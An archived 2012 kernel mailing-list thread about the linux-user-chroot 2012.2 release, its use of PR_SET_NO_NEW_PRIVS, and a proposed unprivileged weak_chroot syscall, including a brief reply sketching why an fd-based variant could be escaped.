headers
Colin Walters | 10 Aug 2012 22:58
Gravatar

linux-user-chroot 2012.2

Hi,

This is the release of linux-user-chroot 2012.2.  The major change now
is that it makes use of Andy's new PR_SET_NO_NEW_PRIVS.  This doesn't
close any security hole I'm aware of - our previous use of the MS_NOSUID
bind mount over / should work - but, belt and suspenders as they say.

The code:
http://git.gnome.org/browse/linux-user-chroot/commit/?id=515c714471d0b5923f6633ef44a2270b23656ee9

As for how linux-user-chroot and PR_SET_NO_NEW_PRIVS relate, see this
thread:
http://thread.gmane.org/gmane.linux.kernel.lsm/15339

Summary
-------

This tool allows regular (non-root) users to call chroot(2), create
Linux bind mounts, and use some Linux container features.  It's
primarily intended for use by build systems.

Project information
-------------------

There's no web page yet; send patches to
Colin Walters <walters <at> verbum.org>
Permalink | Reply |
headers
Andy Lutomirski | 13 Aug 2012 20:10

Re: linux-user-chroot 2012.2

On Fri, Aug 10, 2012 at 1:58 PM, Colin Walters <walters <at> verbum.org> wrote:
> Hi,
>
> This is the release of linux-user-chroot 2012.2.  The major change now
> is that it makes use of Andy's new PR_SET_NO_NEW_PRIVS.  This doesn't
> close any security hole I'm aware of - our previous use of the MS_NOSUID
> bind mount over / should work - but, belt and suspenders as they say.
>
> The code:
> http://git.gnome.org/browse/linux-user-chroot/commit/?id=515c714471d0b5923f6633ef44a2270b23656ee9
>
> As for how linux-user-chroot and PR_SET_NO_NEW_PRIVS relate, see this
> thread:
> http://thread.gmane.org/gmane.linux.kernel.lsm/15339
>
> Summary
> -------
>
> This tool allows regular (non-root) users to call chroot(2), create
> Linux bind mounts, and use some Linux container features.  It's
> primarily intended for use by build systems.

Nifty.

One of these days, I intend to resurrect my unprivileged chroot kernel
patches.  My current thought is to add a new syscall weak_chroot,
which should have these properties:

1. Can't be used unless no_new_privs is set or you have CAP_SYS_ADMIN.
2. Can't be used if fs->users > 1 (to avoid a trivial no_new_privs bypass).
(Continue reading)

Permalink | Reply |
headers
Jan Engelhardt | 9 Sep 2012 23:24
Picon

Re: linux-user-chroot 2012.2


On Monday 2012-08-13 20:10, Andy Lutomirski wrote:
>
>One of these days, I intend to resurrect my unprivileged chroot kernel
>patches.  My current thought is to add a new syscall weak_chroot,
>which should have these properties:
>[...]
>3. Can't be used to break out of chroot jail.
>
>The interface might be:
>
>weak_chroot_at(int fd, const char *path, int flags)
>[...]
>I'm somewhat tempted to add a flag to weak_chroot_at to break out of
>weak_root jail to prevent people from thinking that it's a security
>feature.  I'm not sure about that, though.

An at variant of chroot would seem to be even more open than the
current name-based variant of chroot.

fd1 = open("/", O_DIRECTORY);
fd2 = open("/home/whatever", O_DIRECTORY);
weak_chroot_at(fd2, ".", 0)
weak_chroot_at(fd1, ".", 0)
Permalink | Reply |

Gmane